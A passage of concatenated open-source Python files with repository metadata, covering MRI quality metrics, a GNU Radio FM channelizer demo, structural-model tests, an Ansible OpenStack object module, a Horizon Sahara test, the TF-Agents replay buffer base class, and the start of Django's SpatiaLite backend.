corresponding to the (partial volume maps).
.. math ::
\text{ICV}^k = \frac{\sum_i p^k_i}{\sum\limits_{x \in X_\text{brain}} 1}
:param list pvms: list of :code:`numpy.ndarray` of partial volume maps.
"""
tissue_vfs = {}
total = 0
for k, lid in list(FSL_FAST_LABELS.items()):
if lid == 0:
continue
tissue_vfs[k] = pvms[lid - 1].sum()
total += tissue_vfs[k]
for k in list(tissue_vfs.keys()):
tissue_vfs[k] /= total
return {k: float(v) for k, v in list(tissue_vfs.items())}
def rpve(pvms, seg):
"""
Computes the :abbr:`rPVe (residual partial voluming error)`
of each tissue class.
.. math ::
\\text{rPVE}^k = \\frac{1}{N} \\left[ \\sum\\limits_{p^k_i \
\\in [0.5, P_{98}]} p^k_i + \\sum\\limits_{p^k_i \\in [P_{2}, 0.5)} 1 - p^k_i \\right]
"""
pvfs = {}
for k, lid in list(FSL_FAST_LABELS.items()):
if lid == 0:
continue
pvmap = pvms[lid - 1]
pvmap[pvmap < 0.] = 0.
pvmap[pvmap >= 1.] = 1.
totalvol = np.sum(pvmap > 0.0)
upth = np.percentile(pvmap[pvmap > 0], 98)
loth = np.percentile(pvmap[pvmap > 0], 2)
pvmap[pvmap < loth] = 0
pvmap[pvmap > upth] = 0
pvfs[k] = (pvmap[pvmap > 0.5].sum() + (1.0 - pvmap[pvmap <= 0.5]).sum()) / totalvol
return {k: float(v) for k, v in list(pvfs.items())}
def summary_stats(img, pvms, airmask=None, erode=True):
r"""
Estimates the mean, the standard deviation, the 95\%
and the 5\% percentiles of each tissue distribution.
.. warning ::
Sometimes (with datasets that have been partially processed), the air
mask will be empty. In those cases, the background stats will be zero
for the mean, median, percentiles and kurtosis, the sum of voxels in
the other remaining labels for ``n``, and finally the MAD and the
:math:`\sigma` will be calculated as:
.. math ::
\sigma_\text{BG} = \sqrt{\sum \sigma_\text{i}^2}
"""
from .. import MRIQC_LOG
from statsmodels.robust.scale import mad
# Check type of input masks
dims = np.squeeze(np.array(pvms)).ndim
if dims == 4:
# If pvms is from FSL FAST, create the bg mask
stats_pvms = [np.zeros_like(img)] + pvms
elif dims == 3:
stats_pvms = [np.ones_like(pvms) - pvms, pvms]
else:
raise RuntimeError('Incorrect image dimensions ({0:d})'.format(
np.array(pvms).ndim))
if airmask is not None:
stats_pvms[0] = airmask
labels = list(FSL_FAST_LABELS.items())
if len(stats_pvms) == 2:
labels = list(zip(['bg', 'fg'], list(range(2))))
output = {}
for k, lid in labels:
mask = np.zeros_like(img, dtype=np.uint8)
mask[stats_pvms[lid] > 0.85] = 1
if erode:
struc = nd.generate_binary_structure(3, 2)
mask = nd.binary_erosion(
mask, structure=struc).astype(np.uint8)
nvox = float(mask.sum())
if nvox < 1e3:
MRIQC_LOG.warning('calculating summary stats of label "%s" in a very small '
'mask (%d voxels)', k, int(nvox))
if k == 'bg':
continue
output[k] = {
'mean': float(img[mask == 1].mean()),
'stdv': float(img[mask == 1].std()),
'median': float(np.median(img[mask == 1])),
'mad': float(mad(img[mask == 1])),
'p95': float(np.percentile(img[mask == 1], 95)),
'p05': float(np.percentile(img[mask == 1], 5)),
'k': float(kurtosis(img[mask == 1])),
'n': nvox,
}
if 'bg' not in output:
output['bg'] = {
'mean': 0.,
'median': 0.,
'p95': 0.,
'p05': 0.,
'k': 0.,
'stdv': sqrt(sum(val['stdv']**2
for _, val in list(output.items()))),
'mad': sqrt(sum(val['mad']**2
for _, val in list(output.items()))),
'n': sum(val['n'] for _, val in list(output.items()))
}
if 'bg' in output and output['bg']['mad'] == 0.0 and output['bg']['stdv'] > 1.0:
MRIQC_LOG.warning('estimated MAD in the background was too small ('
'MAD=%f)', output['bg']['mad'])
output['bg']['mad'] = output['bg']['stdv'] / DIETRICH_FACTOR
return output
def _prepare_mask(mask, label, erode=True):
fgmask = mask.copy()
if np.issubdtype(fgmask.dtype, np.integer):
if isinstance(label, string_types):
label = FSL_FAST_LABELS[label]
fgmask[fgmask != label] = 0
fgmask[fgmask == label] = 1
else:
fgmask[fgmask > .95] = 1.
fgmask[fgmask < 1.] = 0
if erode:
# Create a structural element to be used in an opening operation.
struc = nd.generate_binary_structure(3, 2)
# Perform an opening operation on the background data.
fgmask = nd.binary_opening(fgmask, structure=struc).astype(np.uint8)
return fgmask
| bsd-3-clause | 2,908,086,904,442,594,000 | -628,872,158,545,571,500 | 32.726135 | 97 | 0.62605 | false |
analogdevicesinc/gnuradio | gr-analog/examples/fmtest.py | 40 | 7941 | #!/usr/bin/env python
#
# Copyright 2009,2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr
from gnuradio import blocks
from gnuradio import filter
from gnuradio import analog
from gnuradio import channels
import sys, math, time
try:
import scipy
from scipy import fftpack
except ImportError:
print "Error: Program requires scipy (see: www.scipy.org)."
sys.exit(1)
try:
import pylab
except ImportError:
print "Error: Program requires matplotlib (see: matplotlib.sourceforge.net)."
sys.exit(1)
class fmtx(gr.hier_block2):
def __init__(self, lo_freq, audio_rate, if_rate):
gr.hier_block2.__init__(self, "build_fm",
gr.io_signature(1, 1, gr.sizeof_float),
gr.io_signature(1, 1, gr.sizeof_gr_complex))
fmtx = analog.nbfm_tx(audio_rate, if_rate, max_dev=5e3, tau=75e-6)
# Local oscillator
lo = analog.sig_source_c(if_rate, # sample rate
analog.GR_SIN_WAVE, # waveform type
lo_freq, # frequency
1.0, # amplitude
0) # DC Offset
mixer = blocks.multiply_cc()
self.connect(self, fmtx, (mixer, 0))
self.connect(lo, (mixer, 1))
self.connect(mixer, self)
class fmtest(gr.top_block):
def __init__(self):
gr.top_block.__init__(self)
self._nsamples = 1000000
self._audio_rate = 8000
# Set up N channels with their own baseband and IF frequencies
self._N = 5
chspacing = 16000
freq = [10, 20, 30, 40, 50]
f_lo = [0, 1*chspacing, -1*chspacing, 2*chspacing, -2*chspacing]
self._if_rate = 4*self._N*self._audio_rate
# Create a signal source and frequency modulate it
self.sum = blocks.add_cc()
for n in xrange(self._N):
sig = analog.sig_source_f(self._audio_rate, analog.GR_SIN_WAVE, freq[n], 0.5)
fm = fmtx(f_lo[n], self._audio_rate, self._if_rate)
self.connect(sig, fm)
self.connect(fm, (self.sum, n))
self.head = blocks.head(gr.sizeof_gr_complex, self._nsamples)
self.snk_tx = blocks.vector_sink_c()
self.channel = channels.channel_model(0.1)
self.connect(self.sum, self.head, self.channel, self.snk_tx)
# Design the channlizer
self._M = 10
bw = chspacing/2.0
t_bw = chspacing/10.0
self._chan_rate = self._if_rate / self._M
self._taps = filter.firdes.low_pass_2(1, self._if_rate, bw, t_bw,
attenuation_dB=100,
window=filter.firdes.WIN_BLACKMAN_hARRIS)
tpc = math.ceil(float(len(self._taps)) / float(self._M))
print "Number of taps: ", len(self._taps)
print "Number of channels: ", self._M
print "Taps per channel: ", tpc
self.pfb = filter.pfb.channelizer_ccf(self._M, self._taps)
self.connect(self.channel, self.pfb)
# Create a file sink for each of M output channels of the filter and connect it
self.fmdet = list()
self.squelch = list()
self.snks = list()
for i in xrange(self._M):
self.fmdet.append(analog.nbfm_rx(self._audio_rate, self._chan_rate))
self.squelch.append(analog.standard_squelch(self._audio_rate*10))
self.snks.append(blocks.vector_sink_f())
self.connect((self.pfb, i), self.fmdet[i], self.squelch[i], self.snks[i])
def num_tx_channels(self):
return self._N
def num_rx_channels(self):
return self._M
def main():
fm = fmtest()
tstart = time.time()
fm.run()
tend = time.time()
if 1:
fig1 = pylab.figure(1, figsize=(12,10), facecolor="w")
fig2 = pylab.figure(2, figsize=(12,10), facecolor="w")
fig3 = pylab.figure(3, figsize=(12,10), facecolor="w")
Ns = 10000
Ne = 100000
fftlen = 8192
winfunc = scipy.blackman
# Plot transmitted signal
fs = fm._if_rate
d = fm.snk_tx.data()[Ns:Ns+Ne]
sp1_f = fig1.add_subplot(2, 1, 1)
X,freq = sp1_f.psd(d, NFFT=fftlen, noverlap=fftlen/4, Fs=fs,
window = lambda d: d*winfunc(fftlen),
visible=False)
X_in = 10.0*scipy.log10(abs(fftpack.fftshift(X)))
f_in = scipy.arange(-fs/2.0, fs/2.0, fs/float(X_in.size))
p1_f = sp1_f.plot(f_in, X_in, "b")
sp1_f.set_xlim([min(f_in), max(f_in)+1])
sp1_f.set_ylim([-120.0, 20.0])
sp1_f.set_title("Input Signal", weight="bold")
sp1_f.set_xlabel("Frequency (Hz)")
sp1_f.set_ylabel("Power (dBW)")
Ts = 1.0/fs
Tmax = len(d)*Ts
t_in = scipy.arange(0, Tmax, Ts)
x_in = scipy.array(d)
sp1_t = fig1.add_subplot(2, 1, 2)
p1_t = sp1_t.plot(t_in, x_in.real, "b-o")
#p1_t = sp1_t.plot(t_in, x_in.imag, "r-o")
sp1_t.set_ylim([-5, 5])
# Set up the number of rows and columns for plotting the subfigures
Ncols = int(scipy.floor(scipy.sqrt(fm.num_rx_channels())))
Nrows = int(scipy.floor(fm.num_rx_channels() / Ncols))
if(fm.num_rx_channels() % Ncols != 0):
Nrows += 1
# Plot each of the channels outputs. Frequencies on Figure 2 and
# time signals on Figure 3
fs_o = fm._audio_rate
for i in xrange(len(fm.snks)):
# remove issues with the transients at the beginning
# also remove some corruption at the end of the stream
# this is a bug, probably due to the corner cases
d = fm.snks[i].data()[Ns:Ne]
sp2_f = fig2.add_subplot(Nrows, Ncols, 1+i)
X,freq = sp2_f.psd(d, NFFT=fftlen, noverlap=fftlen/4, Fs=fs_o,
window = lambda d: d*winfunc(fftlen),
visible=False)
#X_o = 10.0*scipy.log10(abs(fftpack.fftshift(X)))
X_o = 10.0*scipy.log10(abs(X))
#f_o = scipy.arange(-fs_o/2.0, fs_o/2.0, fs_o/float(X_o.size))
f_o = scipy.arange(0, fs_o/2.0, fs_o/2.0/float(X_o.size))
p2_f = sp2_f.plot(f_o, X_o, "b")
sp2_f.set_xlim([min(f_o), max(f_o)+0.1])
sp2_f.set_ylim([-120.0, 20.0])
sp2_f.grid(True)
sp2_f.set_title(("Channel %d" % i), weight="bold")
sp2_f.set_xlabel("Frequency (kHz)")
sp2_f.set_ylabel("Power (dBW)")
Ts = 1.0/fs_o
Tmax = len(d)*Ts
t_o = scipy.arange(0, Tmax, Ts)
x_t = scipy.array(d)
sp2_t = fig3.add_subplot(Nrows, Ncols, 1+i)
p2_t = sp2_t.plot(t_o, x_t.real, "b")
p2_t = sp2_t.plot(t_o, x_t.imag, "r")
sp2_t.set_xlim([min(t_o), max(t_o)+1])
sp2_t.set_ylim([-1, 1])
sp2_t.set_xlabel("Time (s)")
sp2_t.set_ylabel("Amplitude")
pylab.show()
if __name__ == "__main__":
main()
| gpl-3.0 | -8,652,132,297,931,338,000 | 2,658,118,173,485,160,400 | 33.676856 | 89 | 0.549805 | false |
eng-tools/sfsimodels | tests/test_interaction.py | 1 | 2586 | from sfsimodels import models
import sfsimodels as sm
import json
import numpy as np
def test_link_building_and_soil():
number_of_storeys = 6
interstorey_height = 3.4 # m
n_bays = 3
fb = models.FrameBuilding(number_of_storeys, n_bays)
fb.id = 1
fb.interstorey_heights = interstorey_height * np.ones(number_of_storeys)
fb.floor_length = 18.0 # m
fb.floor_width = 16.0 # m
fd = models.RaftFoundation()
fd.length = 4
fd.width = 6
fd.height = 0.0
fd.density = 3
fd2 = models.RaftFoundation()
fd2.length = 14
fd2.width = 16
fd2.height = 10.0
fd2.density = 13
# link building to foundation
fd.set_building(fb, two_way=False)
assert fd.building.n_bays == 3
assert fb.foundation is None
fd.set_building(fb, two_way=True)
assert fb.foundation.length == 4
# one way link
fb.set_foundation(fd2, two_way=False)
assert fb.foundation.length == 14
assert fd2.building is None
fb.set_foundation(fd2, two_way=True)
assert fb.foundation.length == 14
assert np.isclose(fd2.building.floor_width, 16.0)
structure = models.SDOFBuilding()
structure.set_foundation(fd, two_way=True)
assert structure.foundation.width == 6
assert isinstance(fd.building, models.SDOFBuilding)
def test_save_and_load_w_linked_building_and_soil():
number_of_storeys = 6
interstorey_height = 3.4 # m
wb = models.WallBuilding(number_of_storeys)
wb.id = 1
wb.interstorey_heights = interstorey_height * np.ones(number_of_storeys)
wb.floor_length = 18.0 # m
wb.floor_width = 16.0 # m
fd = models.RaftFoundation()
fd.length = 4
fd.width = 6
fd.height = 0.0
fd.density = 3
fd.id = 1
# link building to foundation
fd.set_building(wb, two_way=False)
assert fd.building.n_storeys == number_of_storeys
assert wb.foundation is None
fd.set_building(wb, two_way=True)
assert wb.foundation.length == 4
ecp_output = sm.Output()
ecp_output.add_to_dict(wb)
ecp_output.add_to_dict(fd)
ecp_output.name = "a single wall building"
ecp_output.units = "N, kg, m, s"
ecp_output.comments = ""
p_str = json.dumps(ecp_output.to_dict(), skipkeys=["__repr__"], indent=4)
objs = sm.loads_json(p_str)
building = objs["building"][1]
foundation = objs["foundation"][1]
assert foundation.width == 6
assert building.foundation.width == 6, building.fd
assert np.isclose(building.floor_length, 18.0)
if __name__ == '__main__':
test_save_and_load_w_linked_building_and_soil() | mit | 2,428,146,279,325,334,000 | 5,288,080,863,899,878,000 | 27.119565 | 77 | 0.650812 | false |
incaser/odoo-odoo | addons/l10n_de/__init__.py | 693 | 1057 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -5,605,323,569,114,361,000 | 6,987,471,378,879,419,000 | 44.956522 | 79 | 0.606433 | false |
stianvi/ansible-modules-core | cloud/openstack/os_object.py | 58 | 4111 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2013, Benno Joy <[email protected]>
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
try:
import shade
HAS_SHADE = True
except ImportError:
HAS_SHADE = False
DOCUMENTATION = '''
---
module: os_object
short_description: Create or Delete objects and containers from OpenStack
version_added: "2.0"
author: "Monty Taylor (@emonty)"
extends_documentation_fragment: openstack
description:
- Create or Delete objects and containers from OpenStack
options:
container:
description:
- The name of the container in which to create the object
required: true
name:
description:
- Name to be give to the object. If omitted, operations will be on
the entire container
required: false
filename:
description:
- Path to local file to be uploaded.
required: false
container_access:
description:
- desired container access level.
required: false
choices: ['private', 'public']
default: private
state:
description:
- Should the resource be present or absent.
choices: [present, absent]
default: present
'''
EXAMPLES = '''
# Creates a object named 'fstab' in the 'config' container
- os_object: cloud=mordred state=present name=fstab container=config filename=/etc/fstab
# Deletes a container called config and all of its contents
- os_object: cloud=rax-iad state=absent container=config
'''
def process_object(
cloud_obj, container, name, filename, container_access, **kwargs):
changed = False
container_obj = cloud_obj.get_container(container)
if kwargs['state'] == 'present':
if not container_obj:
container_obj = cloud_obj.create_container(container)
changed = True
if cloud_obj.get_container_access(container) != container_access:
cloud_obj.set_container_access(container, container_access)
changed = True
if name:
if cloud_obj.is_object_stale(container, name, filename):
cloud_obj.create_object(container, name, filename)
changed = True
else:
if container_obj:
if name:
if cloud_obj.get_object_metadata(container, name):
cloud_obj.delete_object(container, name)
changed= True
else:
cloud_obj.delete_container(container)
changed= True
return changed
def main():
argument_spec = openstack_full_argument_spec(
name=dict(required=False, default=None),
container=dict(required=True),
filename=dict(required=False, default=None),
container_access=dict(default='private', choices=['private', 'public']),
state=dict(default='present', choices=['absent', 'present']),
)
module_kwargs = openstack_module_kwargs()
module = AnsibleModule(argument_spec, **module_kwargs)
if not HAS_SHADE:
module.fail_json(msg='shade is required for this module')
try:
cloud = shade.openstack_cloud(**module.params)
changed = process_object(cloud, **module.params)
module.exit_json(changed=changed)
except shade.OpenStackCloudException as e:
module.fail_json(msg=str(e))
# this is magic, see lib/ansible/module_common.py
from ansible.module_utils.basic import *
from ansible.module_utils.openstack import *
if __name__ == "__main__":
main()
| gpl-3.0 | 8,272,088,370,793,105,000 | 6,798,099,357,158,851,000 | 31.370079 | 88 | 0.668207 | false |
philoniare/horizon | openstack_dashboard/test/integration_tests/tests/test_sahara_image_registry.py | 37 | 2145 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack_dashboard.test.integration_tests import helpers
from openstack_dashboard.test.integration_tests.tests import decorators
IMAGE_NAME = helpers.gen_random_resource_name("image")
@decorators.services_required("sahara")
class TestSaharaImageRegistry(helpers.TestCase):
def setUp(self):
super(TestSaharaImageRegistry, self).setUp()
image_pg = self.home_pg.go_to_compute_imagespage()
image_pg.create_image(IMAGE_NAME)
image_pg.wait_until_image_active(IMAGE_NAME)
def test_image_register_unregister(self):
"""Test the image registration in Sahara."""
image_reg_pg = self.home_pg.go_to_dataprocessing_imageregistrypage()
image_reg_pg.register_image(IMAGE_NAME, self.CONFIG.scenario.ssh_user,
"Test description")
image_reg_pg.wait_until_image_registered(IMAGE_NAME)
self.assertTrue(image_reg_pg.is_image_registered(IMAGE_NAME),
"Image was not registered.")
self.assertFalse(image_reg_pg.is_error_message_present(),
"Error message occurred during image creation.")
image_reg_pg.unregister_image(IMAGE_NAME)
self.assertFalse(image_reg_pg.is_error_message_present())
self.assertFalse(image_reg_pg.is_image_registered(IMAGE_NAME),
"Image was not unregistered.")
def tearDown(self):
image_pg = self.home_pg.go_to_compute_imagespage()
image_pg.delete_image(IMAGE_NAME)
super(TestSaharaImageRegistry, self).tearDown()
| apache-2.0 | 129,877,133,685,121,260 | 4,072,309,267,724,292,000 | 45.630435 | 78 | 0.683916 | false |
tensorflow/agents | tf_agents/replay_buffers/replay_buffer.py | 1 | 13019 | # coding=utf-8
# Copyright 2020 The TF-Agents Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TF-Agents Replay Buffer API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import abc
import tensorflow as tf
from tf_agents.utils import common
from tensorflow.python.data.util import nest as data_nest # pylint:disable=g-direct-tensorflow-import # TF internal
from tensorflow.python.util import deprecation # pylint:disable=g-direct-tensorflow-import # TF internal
class ReplayBuffer(tf.Module):
"""Abstract base class for TF-Agents replay buffer.
In eager mode, methods modify the buffer or return values directly. In graph
mode, methods return ops that do so when executed.
"""
def __init__(self, data_spec, capacity, stateful_dataset=False):
"""Initializes the replay buffer.
Args:
data_spec: A spec or a list/tuple/nest of specs describing a single item
that can be stored in this buffer
capacity: number of elements that the replay buffer can hold.
stateful_dataset: whether the dataset contains stateful ops or not.
"""
super(ReplayBuffer, self).__init__()
common.check_tf1_allowed()
self._data_spec = data_spec
self._capacity = capacity
self._stateful_dataset = stateful_dataset
@property
def data_spec(self):
"""Returns the spec for items in the replay buffer."""
return self._data_spec
@property
def capacity(self):
"""Returns the capacity of the replay buffer."""
return self._capacity
@property
def stateful_dataset(self):
"""Returns whether the dataset of the replay buffer has stateful ops."""
return self._stateful_dataset
def num_frames(self):
"""Returns the number of frames in the replay buffer."""
return self._num_frames()
def add_batch(self, items):
"""Adds a batch of items to the replay buffer.
Args:
items: An item or list/tuple/nest of items to be added to the replay
buffer. `items` must match the data_spec of this class, with a
batch_size dimension added to the beginning of each tensor/array.
Returns:
Adds `items` to the replay buffer.
"""
return self._add_batch(items)
@deprecation.deprecated(
date=None,
instructions=(
'Use `as_dataset(..., single_deterministic_pass=False) instead.'
))
def get_next(self, sample_batch_size=None, num_steps=None, time_stacked=True):
"""Returns an item or batch of items from the buffer.
Args:
sample_batch_size: (Optional.) An optional batch_size to specify the
number of items to return. If None (default), a single item is returned
which matches the data_spec of this class (without a batch dimension).
Otherwise, a batch of sample_batch_size items is returned, where each
tensor in items will have its first dimension equal to sample_batch_size
and the rest of the dimensions match the corresponding data_spec. See
examples below.
num_steps: (Optional.) Optional way to specify that sub-episodes are
desired. If None (default), in non-episodic replay buffers, a batch of
single items is returned. In episodic buffers, full episodes are
returned (note that sample_batch_size must be None in that case).
Otherwise, a batch of sub-episodes is returned, where a sub-episode is a
sequence of consecutive items in the replay_buffer. The returned tensors
will have first dimension equal to sample_batch_size (if
sample_batch_size is not None), subsequent dimension equal to num_steps,
if time_stacked=True and remaining dimensions which match the data_spec
of this class. See examples below.
time_stacked: (Optional.) Boolean, when true and num_steps > 1 it returns
the items stacked on the time dimension. See examples below for details.
Examples of tensor shapes returned: (B = batch size, T = timestep, D =
data spec) get_next(sample_batch_size=None, num_steps=None,
time_stacked=True)
return shape (non-episodic): [D]
return shape (episodic): [T, D] (T = full length of the episode)
get_next(sample_batch_size=B, num_steps=None, time_stacked=True)
return shape (non-episodic): [B, D]
return shape (episodic): Not supported get_next(sample_batch_size=B,
num_steps=T, time_stacked=True)
return shape: [B, T, D] get_next(sample_batch_size=None, num_steps=T,
time_stacked=False)
return shape: ([D], [D], ..) T tensors in the tuple
get_next(sample_batch_size=B, num_steps=T, time_stacked=False)
return shape: ([B, D], [B, D], ..) T tensors in the tuple
Returns:
A 2-tuple containing:
- An item or sequence of (optionally batched and stacked) items.
- Auxiliary info for the items (i.e. ids, probs).
"""
return self._get_next(sample_batch_size, num_steps, time_stacked)
def as_dataset(self,
sample_batch_size=None,
num_steps=None,
num_parallel_calls=None,
sequence_preprocess_fn=None,
single_deterministic_pass=False):
"""Creates and returns a dataset that returns entries from the buffer.
A single entry from the dataset is the result of the following pipeline:
* Sample sequences from the underlying data store
* (optionally) Process them with `sequence_preprocess_fn`,
* (optionally) Split them into subsequences of length `num_steps`
* (optionally) Batch them into batches of size `sample_batch_size`.
In practice, this pipeline is executed in parallel as much as possible
if `num_parallel_calls != 1`.
Some additional notes:
If `num_steps is None`, different replay buffers will behave differently.
For example, `TFUniformReplayBuffer` will return single time steps without
a time dimension. In contrast, e.g., `EpisodicReplayBuffer` will return
full sequences (since each sequence may be an episode of unknown length,
the outermost shape dimension will be `None`).
If `sample_batch_size is None`, no batching is performed; and there is no
outer batch dimension in the returned Dataset entries. This setting
is useful with variable episode lengths using e.g. `EpisodicReplayBuffer`,
because it allows the user to get full episodes back, and use `tf.data`
to build padded or truncated batches themselves.
If `single_determinsitic_pass == True`, the replay buffer will make
every attempt to ensure every time step is visited once and exactly once
in a deterministic manner (though true determinism depends on the
underlying data store). Additional work may be done to ensure minibatches
do not have multiple rows from the same episode. In some cases, this
may mean arguments like `num_parallel_calls` are ignored.
Args:
sample_batch_size: (Optional.) An optional batch_size to specify the
number of items to return. If None (default), a single item is returned
which matches the data_spec of this class (without a batch dimension).
Otherwise, a batch of sample_batch_size items is returned, where each
tensor in items will have its first dimension equal to sample_batch_size
and the rest of the dimensions match the corresponding data_spec.
num_steps: (Optional.) Optional way to specify that sub-episodes are
desired. If None (default), a batch of single items is returned.
Otherwise, a batch of sub-episodes is returned, where a sub-episode is a
sequence of consecutive items in the replay_buffer. The returned tensors
will have first dimension equal to sample_batch_size (if
sample_batch_size is not None), subsequent dimension equal to num_steps,
and remaining dimensions which match the data_spec of this class.
num_parallel_calls: (Optional.) A `tf.int32` scalar `tf.Tensor`,
representing the number elements to process in parallel. If not
specified, elements will be processed sequentially.
sequence_preprocess_fn: (Optional) fn for preprocessing the collected
data before it is split into subsequences of length `num_steps`.
Defined in `TFAgent.preprocess_sequence`. Defaults to pass through.
single_deterministic_pass: Python boolean. If `True`, the dataset will
return a single deterministic pass through its underlying data.
**NOTE**: If the buffer is modified while a Dataset iterator is
iterating over this data, the iterator may miss any new data or
otherwise have subtly invalid data.
Returns:
A dataset of type tf.data.Dataset, elements of which are 2-tuples of:
- An item or sequence of items or batch thereof
- Auxiliary info for the items (i.e. ids, probs).
Raises:
NotImplementedError: If a non-default argument value is not supported.
ValueError: If the data spec contains lists that must be converted to
tuples.
"""
# data_tf.nest.flatten does not flatten python lists, nest.flatten does.
if tf.nest.flatten(self._data_spec) != data_nest.flatten(self._data_spec):
raise ValueError(
'Cannot perform gather; data spec contains lists and this conflicts '
'with gathering operator. Convert any lists to tuples. '
'For example, if your spec looks like [a, b, c], '
'change it to (a, b, c). Spec structure is:\n {}'.format(
tf.nest.map_structure(lambda spec: spec.dtype, self._data_spec)))
if single_deterministic_pass:
ds = self._single_deterministic_pass_dataset(
sample_batch_size=sample_batch_size,
num_steps=num_steps,
sequence_preprocess_fn=sequence_preprocess_fn,
num_parallel_calls=num_parallel_calls)
else:
ds = self._as_dataset(
sample_batch_size=sample_batch_size,
num_steps=num_steps,
sequence_preprocess_fn=sequence_preprocess_fn,
num_parallel_calls=num_parallel_calls)
if self._stateful_dataset:
options = tf.data.Options()
if hasattr(options, 'experimental_allow_stateful'):
options.experimental_allow_stateful = True
ds = ds.with_options(options)
return ds
@deprecation.deprecated(
date=None,
instructions=(
'Use `as_dataset(..., single_deterministic_pass=True)` instead.'
))
def gather_all(self):
"""Returns all the items in buffer.
Returns:
Returns all the items currently in the buffer. Returns a tensor
of shape [B, T, ...] where B = batch size, T = timesteps,
and the remaining shape is the shape spec of the items in the buffer.
"""
return self._gather_all()
def clear(self):
"""Resets the contents of replay buffer.
Returns:
Clears the replay buffer contents.
"""
return self._clear()
# Subclasses must implement these methods.
@abc.abstractmethod
def _num_frames(self):
"""Returns the number of frames in the replay buffer."""
raise NotImplementedError
@abc.abstractmethod
def _add_batch(self, items):
"""Adds a batch of items to the replay buffer."""
raise NotImplementedError
@abc.abstractmethod
def _get_next(self, sample_batch_size, num_steps, time_stacked):
"""Returns an item or batch of items from the buffer."""
raise NotImplementedError
@abc.abstractmethod
def _as_dataset(self,
sample_batch_size,
num_steps,
sequence_preprocess_fn,
num_parallel_calls):
"""Creates and returns a dataset that returns entries from the buffer."""
raise NotImplementedError
@abc.abstractmethod
def _single_deterministic_pass_dataset(self,
sample_batch_size,
num_steps,
sequence_preprocess_fn,
num_parallel_calls):
"""Creates and returns a dataset that returns entries from the buffer."""
raise NotImplementedError
@abc.abstractmethod
def _gather_all(self):
"""Returns all the items in buffer."""
raise NotImplementedError
@abc.abstractmethod
def _clear(self):
"""Clears the replay buffer."""
raise NotImplementedError
| apache-2.0 | 2,817,190,898,536,838,700 | -7,017,018,733,805,697,000 | 41.545752 | 117 | 0.675858 | false |
vitaly4uk/django | django/contrib/gis/db/backends/spatialite/base.py | 445 | 3615 | import sys
from ctypes.util import find_library
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.sqlite3.base import (
Database, DatabaseWrapper as SQLiteDatabaseWrapper, SQLiteCursorWrapper,
)
from django.utils import six
from .client import SpatiaLiteClient
from .features import DatabaseFeatures
from .introspection import SpatiaLiteIntrospection
from .operations import SpatiaLiteOperations
from .schema import SpatialiteSchemaEditor
class DatabaseWrapper(SQLiteDatabaseWrapper):
SchemaEditorClass = SpatialiteSchemaEditor
def __init__(self, *args, **kwargs):
# Before we get too far, make sure pysqlite 2.5+ is installed.
if Database.version_info < (2, 5, 0):
raise ImproperlyConfigured('Only versions of pysqlite 2.5+ are '
'compatible with SpatiaLite and GeoDjango.')
# Trying to find the location of the SpatiaLite library.
# Here we are figuring out the path to the SpatiaLite library
# (`libspatialite`). If it's not in the system library path (e.g., it
# cannot be found by `ctypes.util.find_library`), then it may be set
# manually in the settings via the `SPATIALITE_LIBRARY_PATH` setting.
self.spatialite_lib = getattr(settings, 'SPATIALITE_LIBRARY_PATH',
find_library('spatialite'))
if not self.spatialite_lib:
raise ImproperlyConfigured('Unable to locate the SpatiaLite library. '
'Make sure it is in your library path, or set '
'SPATIALITE_LIBRARY_PATH in your settings.'
)
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = SpatiaLiteOperations(self)
self.client = SpatiaLiteClient(self)
self.introspection = SpatiaLiteIntrospection(self)
def get_new_connection(self, conn_params):
conn = super(DatabaseWrapper, self).get_new_connection(conn_params)
# Enabling extension loading on the SQLite connection.
try:
conn.enable_load_extension(True)
except AttributeError:
raise ImproperlyConfigured(
